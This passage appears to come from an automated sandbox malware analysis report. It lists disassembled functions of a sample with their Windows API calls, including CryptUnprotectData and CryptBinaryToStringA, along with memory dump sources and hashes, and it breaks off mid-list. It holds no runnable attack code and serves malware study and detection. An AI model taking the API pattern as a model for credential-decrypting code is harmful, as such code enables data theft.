                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Q$'){U$G $]k/
                            • API String ID: 0-2226023284
                            • Opcode ID: d489f2c6b780d046c0edc26cd9c3c4470a3a2417a1ffe2a7d952145c6a2bc9fb
                            • Instruction ID: fe4afe9f2d47616b8490ae450c738c2923cdd6d6a3f4540656f8a5288bf00674
                            • Opcode Fuzzy Hash: d489f2c6b780d046c0edc26cd9c3c4470a3a2417a1ffe2a7d952145c6a2bc9fb
                            • Instruction Fuzzy Hash: 87B2E5F360C200AFE704AE29EC8577AFBE5EF94720F1A493DEAC487744E63558058697
                            Function 00688EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,00675184,40000001,00000000,00000000,?,00675184), ref: 00688EC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: eb6d2fc5bbbcf265ef230675e0ef01f988e7d0b6758c404b98c0c14c5c9094d3
                            • Instruction ID: 10e97aea663fcae5b47ca6c714858987213b813352b3804a7d3ff10bc83d59dc
                            • Opcode Fuzzy Hash: eb6d2fc5bbbcf265ef230675e0ef01f988e7d0b6758c404b98c0c14c5c9094d3
                            • Instruction Fuzzy Hash: 4D112A70200208FFDB04DF64E888FAB37AABF89340F509658FA198B250DB75EC41DB60
                            Function 00687A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,012BEE68,00000000,?,00690E10,00000000,?,00000000,00000000), ref: 00687A63
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00687A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,012BEE68,00000000,?,00690E10,00000000,?,00000000,00000000,?), ref: 00687A7D
                            • wsprintfA.USER32 ref: 00687AB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: cf214e382b6bc969a1315564be05b9c052f228caaf1f68bbe5e48e3608801d9c
                            • Instruction ID: cd833c300c492939a18393ee66f777b21d78d496e681a677704ac979c0f8e4df
                            • Opcode Fuzzy Hash: cf214e382b6bc969a1315564be05b9c052f228caaf1f68bbe5e48e3608801d9c
                            • Instruction Fuzzy Hash: 52118EB1945218EBEB249B54DC49FA9B778FB04721F1043AAE91A932C0D7745A40CF91
                            Function 00A3311C Relevance: 5.4, Strings: 3, Instructions: 1643COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: -}$U%w{$a?g
                            • API String ID: 0-1225954905
                            • Opcode ID: 57c32c4e15387565f05dfdb0ef3f1dfb24979a90f1ae45cd28b54361442001ba
                            • Instruction ID: 241ca43925c4932b13242017c7079a627f5b07c8931156385ef496c9096d5209
                            • Opcode Fuzzy Hash: 57c32c4e15387565f05dfdb0ef3f1dfb24979a90f1ae45cd28b54361442001ba
                            • Instruction Fuzzy Hash: 81B205F360C2049FE7046E2DEC8567ABBE9EF94320F1A463DEAC4C7744EA3558058697
                            Function 00A3E8C8 Relevance: 5.4, Strings: 3, Instructions: 1612COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: j.]y$zoo${W{;
                            • API String ID: 0-1096613218
                            • Opcode ID: c8c679c519bf355c1377f4b3b711c30a18ef8b23d6dd4551e64fd195acc58130
                            • Instruction ID: 83b6b04f2ebb1c644d5c12a375842d80ea3d6610b33bf23947d0813903abf41e
                            • Opcode Fuzzy Hash: c8c679c519bf355c1377f4b3b711c30a18ef8b23d6dd4551e64fd195acc58130
                            • Instruction Fuzzy Hash: E3B214F360C204AFE304AE29EC8567AFBE5EF94720F1A493DE6C4C3744EA3558458697
                            Function 00A39B28 Relevance: 5.3, Strings: 3, Instructions: 1548COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %!$Z}~j${"}{
                            • API String ID: 0-624438500
                            • Opcode ID: 3258fb987fda42cb3973c36b5059a51a1ac5e1322f689a31270b964f70d430c8
                            • Instruction ID: f28d928f3e57bc70076b129d2d3256699270270ee5030bd5661aa77395c81a8e
                            • Opcode Fuzzy Hash: 3258fb987fda42cb3973c36b5059a51a1ac5e1322f689a31270b964f70d430c8
                            • Instruction Fuzzy Hash: 56A2E4F360C6009FE304AE29EC85B7ABBE5EF98320F1A493DE6C5C3744E67558058697
                            Function 00683720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.COMBASE(0068E118,00000000,00000001,0068E108,00000000), ref: 00683758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006837B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: 504344531d1070b4d6ab0c188d5a8a94aefebd451c56bec5fb806eb740b1ce53
                            • Instruction ID: 22fc7847402fe7e44ca13475cf1a970d3b19330d95b9c32abffd4fd332cb0b48
                            • Opcode Fuzzy Hash: 504344531d1070b4d6ab0c188d5a8a94aefebd451c56bec5fb806eb740b1ce53
                            • Instruction Fuzzy Hash: DF41D970A40A289FDB24DF58CC95B9BB7B5BB48702F4052D8E609E72D0D7716E85CF50
                            Function 00679B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00679B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00679BA3
                            • LocalFree.KERNEL32(?), ref: 00679BD3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 032966990c84a4614602ed3e3b8609afb2be9e565ab322d6eccb54d160d02aa9
                            • Instruction ID: 25ca91693239253771b7e59cd2bb4a643c5580df30605f0704a683315cab2ff1
                            • Opcode Fuzzy Hash: 032966990c84a4614602ed3e3b8609afb2be9e565ab322d6eccb54d160d02aa9
                            • Instruction Fuzzy Hash: 4111C9B8A00209EFDB04DF94D999AAE77F5FF89700F104698E915A7350D770AE10CFA1
                            Function 00A4AB89 Relevance: 2.4, Strings: 1, Instructions: 1116COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: qkm
                            • API String ID: 0-3173522632
                            • Opcode ID: 82c5d3a96085e210c49b7c4cd02fba5aa81880344919bbb391910f309c2750fa
                            • Instruction ID: 3943a91f3fd9a7907bc97f70bc25ddea3bf4161b51778d78fcc2b9e5c4207f9e
                            • Opcode Fuzzy Hash: 82c5d3a96085e210c49b7c4cd02fba5aa81880344919bbb391910f309c2750fa
                            • Instruction Fuzzy Hash: 1672E2F360C2149FE304AF29EC8567ABBE5EF94720F16492DEAC4C7744E63598408B97
                            Function 009FBB1A Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ~hO
                            • API String ID: 0-3737031977
                            • Opcode ID: 9b2b373a9e813042422f3ded08577061f3e54f5a21ff75add330aa146da300a4
                            • Instruction ID: f7d95564c6d011a7c43c953f56b4e859153095944fee8c450ea61eb286910e6a
                            • Opcode Fuzzy Hash: 9b2b373a9e813042422f3ded08577061f3e54f5a21ff75add330aa146da300a4
                            • Instruction Fuzzy Hash: C54148F3B082105FF3185A29EC857BAB796DBD4320F1A823DDE8557B84D87A5C0686C5
                            Function 0094705F Relevance: .2, Instructions: 212COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 610e7f9d4bf7eeae55952b2e4db3e857001e886a5bcb94d1ad61d33f09dd5846
                            • Instruction ID: e8a50efc24040f1cb643aa7cd8ed9e86e6cd03cc20ca7a103c746b6e1596b746
                            • Opcode Fuzzy Hash: 610e7f9d4bf7eeae55952b2e4db3e857001e886a5bcb94d1ad61d33f09dd5846
                            • Instruction Fuzzy Hash: 7A512BF3A182105FE7046D2CEC9477ABADADF94360F17493EEBC4C3784E97948058296
                            Function 009EB3E4 Relevance: .2, Instructions: 202COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1742be189f2263dbee17944ddfa261d5c65719b01506292d3897264021ce2502
                            • Instruction ID: bb3c7aea35268db92ffb06fc7462bd22f35755b4b3a422b29e5e11fa4a7ca0c6
                            • Opcode Fuzzy Hash: 1742be189f2263dbee17944ddfa261d5c65719b01506292d3897264021ce2502
                            • Instruction Fuzzy Hash: 4E516AF3E096009BE3086A2DDC9576ABBD6EFD0730F2B453EDA85D7780E9759C014682
                            Function 009CF5FE Relevance: .2, Instructions: 157COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
